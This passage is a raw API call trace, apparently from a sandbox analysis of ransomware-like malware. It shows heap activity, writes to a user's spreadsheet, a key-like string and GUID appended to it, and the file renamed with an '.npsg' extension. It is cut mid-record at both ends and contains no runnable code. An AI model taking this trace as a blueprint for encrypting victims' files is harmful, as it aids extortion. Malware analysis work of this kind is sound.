(HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bc0 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.763] GetCurrentThreadId () returned 0x5b4 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b874c8 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.763] GetCurrentThreadId () returned 0x5b4 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c08 [0238.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ba8 [0238.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bc0 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b90 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c20 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bf0 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bd8 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c38 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bd8 [0238.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bf0 | out: hHeap=0x620000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ba8 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0238.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c20 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bc0 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b861b0 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.768] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0xf133, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0xf133, lpOverlapped=0x0) returned 1 [0238.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.769] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf138, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.769] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0238.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0238.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0238.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.769] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.769] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.769] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.770] CloseHandle (hObject=0x644) returned 1 [0238.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0238.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b88cd0 [0238.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0238.771] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\PqoFdTvR3ywtw967.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\pqofdtvr3ywtw967.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\PqoFdTvR3ywtw967.xls.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\pqofdtvr3ywtw967.xls.npsg")) returned 1 [0238.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.772] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0238.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b49f220, ftCreationTime.dwHighDateTime=0x1d5bdbf, ftLastAccessTime.dwLowDateTime=0x7f4046c0, ftLastAccessTime.dwHighDateTime=0x1d5bce1, ftLastWriteTime.dwLowDateTime=0x7f4046c0, ftLastWriteTime.dwHighDateTime=0x1d5bce1, nFileSizeHigh=0x0, nFileSizeLow=0xf138, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PqoFdTvR3ywtw967.xls", cAlternateFileName="PQOFDT~1.XLS")) returned 0 [0238.774] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0238.774] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0238.774] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 